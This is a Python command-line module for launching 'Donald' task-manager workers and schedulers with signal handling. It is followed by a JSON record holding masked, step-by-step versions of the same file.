loop.add_signal_handler(signal.SIGINT, lambda : loop.create_task(stop()))
loop.add_signal_handler(signal.SIGTERM, lambda : loop.create_task(stop()))
manager: Donald = ctx.obj['manager']
await manager.start()
manager.scheduler.start()
await manager.scheduler.wait()
def main():
loop = asyncio.get_event_loop()
cli(obj={'loop': loop})
if __name__ == '__main__':
main()
<|reserved_special_token_1|>
from __future__ import annotations
import asyncio
import signal
from functools import wraps
from typing import TYPE_CHECKING, Awaitable, Callable
import click
from .utils import import_obj
if TYPE_CHECKING:
from donald.manager import Donald
from .types import TV
def import_manager(path: str) -> Donald:
"""Import a manager from a python path."""
manager: Donald = import_obj(path)
return manager
def process_await(fn: Callable[..., Awaitable[TV]]) -> Callable[..., TV]:
@wraps(fn)
@click.pass_context
def wrapper(ctx, *args, **kwargs):
loop = ctx.obj["loop"]
return loop.run_until_complete(fn(ctx, *args, **kwargs))
return wrapper
@click.group()
@click.option(
"-M",
"--manager",
"manager",
required=True,
help="Python path to the manager",
)
@click.pass_context
def cli(ctx: click.Context, manager: str):
ctx.obj["manager"] = import_manager(manager)
@cli.command(help="Launch a worker")
@click.option("-S", "--scheduler", "scheduler", is_flag=True, help="Start a scheduler")
@process_await
async def worker(ctx: click.Context, *, scheduler: bool = False, **params):
"""Launch a worker."""
loop = ctx.obj["loop"]
async def stop():
loop.remove_signal_handler(signal.SIGTERM)
loop.remove_signal_handler(signal.SIGINT)
await worker.stop()
if scheduler:
await manager.scheduler.stop()
await manager.stop()
loop.add_signal_handler(signal.SIGINT, lambda: loop.create_task(stop()))
loop.add_signal_handler(signal.SIGTERM, lambda: loop.create_task(stop()))
manager: Donald = ctx.obj["manager"]
await manager.start()
if scheduler:
manager.scheduler.start()
worker = manager.create_worker(show_banner=True, **params)
worker.start()
await worker.wait()
@cli.command(help="Launch a scheduler")
@process_await
async def scheduler(ctx: click.Context):
loop = ctx.obj["loop"]
async def stop():
loop.remove_signal_handler(signal.SIGTERM)
loop.remove_signal_handler(signal.SIGINT)
await manager.scheduler.stop()
await manager.stop()
loop.add_signal_handler(signal.SIGINT, lambda: loop.create_task(stop()))
loop.add_signal_handler(signal.SIGTERM, lambda: loop.create_task(stop()))
manager: Donald = ctx.obj["manager"]
await manager.start()
manager.scheduler.start()
await manager.scheduler.wait()
def main():
loop = asyncio.get_event_loop()
cli(obj={"loop": loop})
if __name__ == "__main__":
main()
|
flexible
|
{
"blob_id": "3da4896f368f067a339db5cc89201c93ba8166ce",
"index": 6220,
"step-1": "<mask token>\n\n\ndef process_await(fn: Callable[..., Awaitable[TV]]) ->Callable[..., TV]:\n\n @wraps(fn)\n @click.pass_context\n def wrapper(ctx, *args, **kwargs):\n loop = ctx.obj['loop']\n return loop.run_until_complete(fn(ctx, *args, **kwargs))\n return wrapper\n\n\n@click.group()\n@click.option('-M', '--manager', 'manager', required=True, help=\n 'Python path to the manager')\n@click.pass_context\ndef cli(ctx: click.Context, manager: str):\n ctx.obj['manager'] = import_manager(manager)\n\n\n<mask token>\n\n\ndef main():\n loop = asyncio.get_event_loop()\n cli(obj={'loop': loop})\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef import_manager(path: str) ->Donald:\n \"\"\"Import a manager from a python path.\"\"\"\n manager: Donald = import_obj(path)\n return manager\n\n\ndef process_await(fn: Callable[..., Awaitable[TV]]) ->Callable[..., TV]:\n\n @wraps(fn)\n @click.pass_context\n def wrapper(ctx, *args, **kwargs):\n loop = ctx.obj['loop']\n return loop.run_until_complete(fn(ctx, *args, **kwargs))\n return wrapper\n\n\n@click.group()\n@click.option('-M', '--manager', 'manager', required=True, help=\n 'Python path to the manager')\n@click.pass_context\ndef cli(ctx: click.Context, manager: str):\n ctx.obj['manager'] = import_manager(manager)\n\n\n<mask token>\n\n\ndef main():\n loop = asyncio.get_event_loop()\n cli(obj={'loop': loop})\n\n\n<mask token>\n",
"step-3": "<mask token>\nif TYPE_CHECKING:\n from donald.manager import Donald\n from .types import TV\n\n\ndef import_manager(path: str) ->Donald:\n \"\"\"Import a manager from a python path.\"\"\"\n manager: Donald = import_obj(path)\n return manager\n\n\ndef process_await(fn: Callable[..., Awaitable[TV]]) ->Callable[..., TV]:\n\n @wraps(fn)\n @click.pass_context\n def wrapper(ctx, *args, **kwargs):\n loop = ctx.obj['loop']\n return loop.run_until_complete(fn(ctx, *args, **kwargs))\n return wrapper\n\n\n@click.group()\n@click.option('-M', '--manager', 'manager', required=True, help=\n 'Python path to the manager')\n@click.pass_context\ndef cli(ctx: click.Context, manager: str):\n ctx.obj['manager'] = import_manager(manager)\n\n\n@cli.command(help='Launch a worker')\n@click.option('-S', '--scheduler', 'scheduler', is_flag=True, help=\n 'Start a scheduler')\n@process_await\nasync def worker(ctx: click.Context, *, scheduler: bool=False, **params):\n \"\"\"Launch a worker.\"\"\"\n loop = ctx.obj['loop']\n\n async def stop():\n loop.remove_signal_handler(signal.SIGTERM)\n loop.remove_signal_handler(signal.SIGINT)\n await worker.stop()\n if scheduler:\n await manager.scheduler.stop()\n await manager.stop()\n loop.add_signal_handler(signal.SIGINT, lambda : loop.create_task(stop()))\n loop.add_signal_handler(signal.SIGTERM, lambda : loop.create_task(stop()))\n manager: Donald = ctx.obj['manager']\n await manager.start()\n if scheduler:\n manager.scheduler.start()\n worker = manager.create_worker(show_banner=True, **params)\n worker.start()\n await worker.wait()\n\n\n@cli.command(help='Launch a scheduler')\n@process_await\nasync def scheduler(ctx: click.Context):\n loop = ctx.obj['loop']\n\n async def stop():\n loop.remove_signal_handler(signal.SIGTERM)\n loop.remove_signal_handler(signal.SIGINT)\n await manager.scheduler.stop()\n await manager.stop()\n loop.add_signal_handler(signal.SIGINT, lambda : loop.create_task(stop()))\n loop.add_signal_handler(signal.SIGTERM, lambda : loop.create_task(stop()))\n manager: Donald = ctx.obj['manager']\n await manager.start()\n manager.scheduler.start()\n await manager.scheduler.wait()\n\n\ndef main():\n loop = asyncio.get_event_loop()\n cli(obj={'loop': loop})\n\n\nif __name__ == '__main__':\n main()\n",
"step-4": "from __future__ import annotations\nimport asyncio\nimport signal\nfrom functools import wraps\nfrom typing import TYPE_CHECKING, Awaitable, Callable\nimport click\nfrom .utils import import_obj\nif TYPE_CHECKING:\n from donald.manager import Donald\n from .types import TV\n\n\ndef import_manager(path: str) ->Donald:\n \"\"\"Import a manager from a python path.\"\"\"\n manager: Donald = import_obj(path)\n return manager\n\n\ndef process_await(fn: Callable[..., Awaitable[TV]]) ->Callable[..., TV]:\n\n @wraps(fn)\n @click.pass_context\n def wrapper(ctx, *args, **kwargs):\n loop = ctx.obj['loop']\n return loop.run_until_complete(fn(ctx, *args, **kwargs))\n return wrapper\n\n\n@click.group()\n@click.option('-M', '--manager', 'manager', required=True, help=\n 'Python path to the manager')\n@click.pass_context\ndef cli(ctx: click.Context, manager: str):\n ctx.obj['manager'] = import_manager(manager)\n\n\n@cli.command(help='Launch a worker')\n@click.option('-S', '--scheduler', 'scheduler', is_flag=True, help=\n 'Start a scheduler')\n@process_await\nasync def worker(ctx: click.Context, *, scheduler: bool=False, **params):\n \"\"\"Launch a worker.\"\"\"\n loop = ctx.obj['loop']\n\n async def stop():\n loop.remove_signal_handler(signal.SIGTERM)\n loop.remove_signal_handler(signal.SIGINT)\n await worker.stop()\n if scheduler:\n await manager.scheduler.stop()\n await manager.stop()\n loop.add_signal_handler(signal.SIGINT, lambda : loop.create_task(stop()))\n loop.add_signal_handler(signal.SIGTERM, lambda : loop.create_task(stop()))\n manager: Donald = ctx.obj['manager']\n await manager.start()\n if scheduler:\n manager.scheduler.start()\n worker = manager.create_worker(show_banner=True, **params)\n worker.start()\n await worker.wait()\n\n\n@cli.command(help='Launch a scheduler')\n@process_await\nasync def scheduler(ctx: click.Context):\n loop = ctx.obj['loop']\n\n async def stop():\n loop.remove_signal_handler(signal.SIGTERM)\n loop.remove_signal_handler(signal.SIGINT)\n await manager.scheduler.stop()\n await manager.stop()\n loop.add_signal_handler(signal.SIGINT, lambda : loop.create_task(stop()))\n loop.add_signal_handler(signal.SIGTERM, lambda : loop.create_task(stop()))\n manager: Donald = ctx.obj['manager']\n await manager.start()\n manager.scheduler.start()\n await manager.scheduler.wait()\n\n\ndef main():\n loop = asyncio.get_event_loop()\n cli(obj={'loop': loop})\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": "from __future__ import annotations\n\nimport asyncio\nimport signal\nfrom functools import wraps\nfrom typing import TYPE_CHECKING, Awaitable, Callable\n\nimport click\n\nfrom .utils import import_obj\n\nif TYPE_CHECKING:\n from donald.manager import Donald\n\n from .types import TV\n\n\ndef import_manager(path: str) -> Donald:\n \"\"\"Import a manager from a python path.\"\"\"\n manager: Donald = import_obj(path)\n return manager\n\n\ndef process_await(fn: Callable[..., Awaitable[TV]]) -> Callable[..., TV]:\n @wraps(fn)\n @click.pass_context\n def wrapper(ctx, *args, **kwargs):\n loop = ctx.obj[\"loop\"]\n return loop.run_until_complete(fn(ctx, *args, **kwargs))\n\n return wrapper\n\n\n@click.group()\n@click.option(\n \"-M\",\n \"--manager\",\n \"manager\",\n required=True,\n help=\"Python path to the manager\",\n)\n@click.pass_context\ndef cli(ctx: click.Context, manager: str):\n ctx.obj[\"manager\"] = import_manager(manager)\n\n\n@cli.command(help=\"Launch a worker\")\n@click.option(\"-S\", \"--scheduler\", \"scheduler\", is_flag=True, help=\"Start a scheduler\")\n@process_await\nasync def worker(ctx: click.Context, *, scheduler: bool = False, **params):\n \"\"\"Launch a worker.\"\"\"\n\n loop = ctx.obj[\"loop\"]\n\n async def stop():\n loop.remove_signal_handler(signal.SIGTERM)\n loop.remove_signal_handler(signal.SIGINT)\n await worker.stop()\n if scheduler:\n await manager.scheduler.stop()\n await manager.stop()\n\n loop.add_signal_handler(signal.SIGINT, lambda: loop.create_task(stop()))\n loop.add_signal_handler(signal.SIGTERM, lambda: loop.create_task(stop()))\n\n manager: Donald = ctx.obj[\"manager\"]\n await manager.start()\n if scheduler:\n manager.scheduler.start()\n\n worker = manager.create_worker(show_banner=True, **params)\n worker.start()\n\n await worker.wait()\n\n\n@cli.command(help=\"Launch a scheduler\")\n@process_await\nasync def scheduler(ctx: click.Context):\n loop = ctx.obj[\"loop\"]\n\n async def stop():\n loop.remove_signal_handler(signal.SIGTERM)\n loop.remove_signal_handler(signal.SIGINT)\n await manager.scheduler.stop()\n await manager.stop()\n\n loop.add_signal_handler(signal.SIGINT, lambda: loop.create_task(stop()))\n loop.add_signal_handler(signal.SIGTERM, lambda: loop.create_task(stop()))\n\n manager: Donald = ctx.obj[\"manager\"]\n await manager.start()\n\n manager.scheduler.start()\n await manager.scheduler.wait()\n\n\ndef main():\n loop = asyncio.get_event_loop()\n cli(obj={\"loop\": loop})\n\n\nif __name__ == \"__main__\":\n main()\n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.